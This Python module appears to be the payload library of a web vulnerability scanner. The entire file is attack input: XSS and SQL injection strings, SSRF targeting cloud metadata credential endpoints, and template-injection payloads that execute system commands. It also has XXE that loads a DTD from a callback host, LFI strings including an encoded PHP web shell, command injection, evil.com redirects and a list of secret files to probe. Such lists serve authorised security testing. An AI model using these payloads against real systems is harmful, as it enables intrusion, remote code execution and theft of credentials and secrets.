"""
VulnScan - Payload Library
All payloads for all vulnerability types
"""

XSS_PAYLOADS = [
    "<img src=x onerror=alert(1)>",
    "<svg onload=alert(1)>",
    "<script>alert(1)</script>",
    "<body onpageshow=alert(1)>",
    "<input autofocus onfocus=alert(1)>",
    "<details open ontoggle=alert(1)>",
    "<iframe src=javascript:alert(1)>",
    "<video src=x onerror=alert(1)>",
    '"><img src=x onerror=alert(1)>',
    "'><svg onload=alert(1)>",
    "<ScRiPt>alert(1)</sCrIpT>",
    "<img src=x onerror=alert`1`>",
    "<svg><animate onbegin=alert(1) attributeName=x dur=1s>",
    "javascript:alert(1)",
    "';alert(1)//",
    '";alert(1)//',
    "</script><script>alert(1)</script>",
    "<img src=\"x\" onerror=\"alert(1)\">",
    "<math><mtext></option></select></math><img onerror=alert(1) src>",
    "<%2Fscript%3E%3Cscript%3Ealert(1)%3C%2Fscript%3E",
]

SQLI_PAYLOADS = [
    "'",
    "''",
    "`",
    "\"",
    "' OR '1'='1",
    "' OR '1'='1'--",
    "' OR 1=1--",
    "' OR 1=1#",
    "') OR ('1'='1",
    "' UNION SELECT NULL--",
    "' UNION SELECT NULL,NULL--",
    "' UNION SELECT NULL,NULL,NULL--",
    "' AND '1'='1",
    "' AND '1'='2",
    "1 ORDER BY 1--",
    "1 ORDER BY 100--",
    "' AND SLEEP(3)--",
    "'; WAITFOR DELAY '0:0:3'--",
    "' AND extractvalue(1,concat(0x7e,version()))--",
    "admin'--",
    "admin'#",
    "' OR 'x'='x",
    "1' AND 1=2 UNION SELECT user(),version()--",
]

SQLI_TIME_PAYLOADS = [
    "' AND SLEEP(5)--",
    "\" AND SLEEP(5)--",
    "') AND SLEEP(5)--",
    "1; WAITFOR DELAY '0:0:5'--",
    "1' AND SLEEP(5) AND '1'='1",
    "' AND (SELECT * FROM (SELECT(SLEEP(5)))a)--",
    "1 AND SLEEP(5)",
]

SSRF_PAYLOADS = [
    "http://127.0.0.1/",
    "http://localhost/",
    "http://0.0.0.0/",
    "http://[::1]/",
    "http://169.254.169.254/latest/meta-data/",
    "http://169.254.169.254/latest/meta-data/iam/security-credentials/",
    "http://metadata.google.internal/computeMetadata/v1/",
    "http://169.254.169.254/metadata/instance?api-version=2021-02-01",
    "http://100.100.100.200/latest/meta-data/",
    "http://2130706433/",
    "http://0177.0.0.1/",
    "http://0x7f000001/",
    "file:///etc/passwd",
    "file:///c:/windows/win.ini",
    "dict://127.0.0.1:11211/",
    "gopher://127.0.0.1:80/",
    "http://127.1/",
    "http://127.0.1/",
]

SSTI_PAYLOADS = {
    "generic": [
        "{{7*7}}",
        "${7*7}",
        "<%= 7*7 %>",
        "#{7*7}",
        "*{7*7}",
        "{{7*'7'}}",
        "${{'a':'b'}}",
        "{{config}}",
        "{{self}}",
    ],
    "jinja2": [
        "{{config.items()}}",
        "{{''.__class__.mro()}}",
        "{{request.application.__globals__}}",
        "{{cycler.__init__.__globals__.os.popen('id').read()}}",
    ],
    "twig": [
        "{{_self.env.registerUndefinedFilterCallback('exec')}}{{_self.env.getFilter('id')}}",
        "{{['id']|filter('system')}}",
    ],
    "freemarker": [
        '<#assign ex="freemarker.template.utility.Execute"?new()>${ex("id")}',
    ],
}

XXE_PAYLOADS = [
    """<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE foo [<!ENTITY xxe SYSTEM "file:///etc/passwd">]>
<root>&xxe;</root>""",
    """<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE foo [<!ENTITY xxe SYSTEM "file:///c:/windows/win.ini">]>
<root>&xxe;</root>""",
    """<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE foo [<!ENTITY xxe SYSTEM "http://169.254.169.254/latest/meta-data/">]>
<root>&xxe;</root>""",
    """<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE foo [<!ENTITY % xxe SYSTEM "http://CALLBACK/evil.dtd">%xxe;]>""",
]

LFI_PAYLOADS = [
    "../../../../etc/passwd",
    "../../../etc/passwd",
    "../../etc/passwd",
    "../etc/passwd",
    "../../../../etc/shadow",
    "../../../../etc/hosts",
    "../../../../windows/win.ini",
    "../../../../windows/system32/drivers/etc/hosts",
    "..%2F..%2F..%2F..%2Fetc%2Fpasswd",
    "..%252F..%252F..%252F..%252Fetc%252Fpasswd",
    "....//....//....//etc/passwd",
    "/etc/passwd",
    "/etc/shadow",
    "php://filter/convert.base64-encode/resource=index.php",
    "php://input",
    "data://text/plain;base64,PD9waHAgc3lzdGVtKCRfR0VUWydjbWQnXSk7Pz4=",
    "expect://id",
    "../../../../proc/self/environ",
    "../../../../var/log/apache2/access.log",
]

OPEN_REDIRECT_PAYLOADS = [
    "https://evil.com",
    "//evil.com",
    "///evil.com",
    "////evil.com",
    "/\\evil.com",
    "https://evil.com%2F",
    "https://evil%2ecom",
    "https://target.com@evil.com",
    "https://evil.com#target.com",
    "javascript:alert(1)",
    "//evil.com/%2F..",
    "%2F%2Fevil.com",
]

CMD_INJECTION_PAYLOADS = [
    "; id",
    "| id",
    "|| id",
    "&& id",
    "`id`",
    "$(id)",
    "; sleep 5",
    "| sleep 5",
    "&& sleep 5",
    "`sleep 5`",
    "$(sleep 5)",
    "; ping -c 1 CALLBACK",
    "| ping -c 1 CALLBACK",
    "%0aid",
    "%0a id",
    "\nid",
    "\r\nid",
    ";id;",
    "a;id",
]

PATH_TRAVERSAL_PAYLOADS = [
    "../",
    "../../",
    "../../../",
    "../../../../",
    "../../../../../",
    "..%2F",
    "..%2F..%2F",
    "%2e%2e%2f",
    "%2e%2e/",
    "..%252f",
    "....//",
    "....\\\\",
    ".%2e/",
    "%252e%252e/",
]

SENSITIVE_FILES = [
    "/.git/HEAD",
    "/.git/config",
    "/.git/COMMIT_EDITMSG",
    "/.git/logs/HEAD",
    "/.git/index",
    "/.env",
    "/.env.local",
    "/.env.backup",
    "/.env.production",
    "/.env.development",
    "/config.php",
    "/wp-config.php",
    "/web.config",
    "/web.config.bak",
    "/web.config.old",
    "/settings.php",
    "/settings.php.bak",
    "/config/database.yml",
    "/config/secrets.yml",
    "/database.yml",
    "/docker-compose.yml",
    "/docker-compose.yaml",
    "/Dockerfile",
    "/.htpasswd",
    "/.htaccess",
    "/robots.txt",
    "/sitemap.xml",
    "/.well-known/security.txt",
    "/phpinfo.php",
    "/info.php",
    "/test.php",
    "/admin",
    "/admin/",
    "/administrator",
    "/wp-admin",
    "/wp-login.php",
    "/login",
    "/signin",
    "/api",
    "/api/v1",
    "/api/v2",
    "/swagger-ui.html",
    "/swagger-ui/index.html",
    "/api-docs",
    "/v1/api-docs",
    "/graphql",
    "/.DS_Store",
    "/crossdomain.xml",
    "/clientaccesspolicy.xml",
    "/composer.json",
    "/composer.lock",
    "/package.json",
    "/yarn.lock",
    "/Gemfile",
    "/Gemfile.lock",
    "/requirements.txt",
    "/readme.md",
    "/README.md",
    "/CHANGELOG.md",
    "/.bash_history",
    "/id_rsa",
    "/id_dsa",
    "/server-status",
    "/server-info",
    "/elmah.axd",
    "/trace.axd",
]

BACKUP_EXTENSIONS = [
    ".bak", ".backup", ".old", ".orig", ".copy", ".tmp", ".temp",
    ".swp", ".swo", ".~", "~", ".bk", ".save", ".1", ".2",
]

COMMON_PARAMS = [
    "url", "uri", "path", "file", "page", "document", "src", "source",
    "dest", "destination", "redirect", "return", "callback", "next",
    "target", "redir", "redirect_uri", "redirect_url", "return_url",
    "continue", "link", "q", "search", "query", "id", "user_id",
    "account", "username", "name", "user", "admin", "debug", "test",
    "load", "fetch", "read", "include", "require", "template",
    "preview", "view", "show", "display", "ref", "referer", "site",
    "html", "data", "config", "base", "host", "port", "to", "from",
    "lang", "locale", "region", "country", "format", "type", "cat",
    "category", "tag", "token", "key", "secret", "pass", "password",
    "pwd", "hash", "code", "action", "cmd", "command", "exec",
    "execute", "run", "shell", "ping", "ip", "addr", "address",
]

COMMON_HEADERS_SSRF = [
    "X-Forwarded-For",
    "X-Real-IP",
    "X-Originating-IP",
    "X-Remote-IP",
    "X-Remote-Addr",
    "X-Forwarded-Host",
    "X-Host",
    "X-HTTP-Host-Override",
    "Forwarded",
    "True-Client-IP",
    "CF-Connecting-IP",
    "Referer",
    "Origin",
]

SUBDOMAINS_WORDLIST = [
    "www", "mail", "remote", "blog", "webmail", "server", "ns1", "ns2",
    "smtp", "secure", "vpn", "m", "shop", "ftp", "mail2", "test",
    "portal", "ns", "ww1", "host", "support", "dev", "web", "bbs",
    "ww42", "mx", "email", "cloud", "1", "mail1", "2", "forum",
    "owa", "www2", "gw", "admin", "store", "mx1", "cdn", "api",
    "exchange", "app", "gov", "2tty", "vps", "gov1", "auth",
    "stage", "staging", "beta", "preview", "dashboard", "panel",
    "internal", "intranet", "corp", "git", "gitlab", "jenkins",
    "jira", "confluence", "wiki", "docs", "help", "status",
    "monitor", "metrics", "logs", "assets", "static", "media",
    "img", "images", "video", "files", "dl", "download", "upload",
]
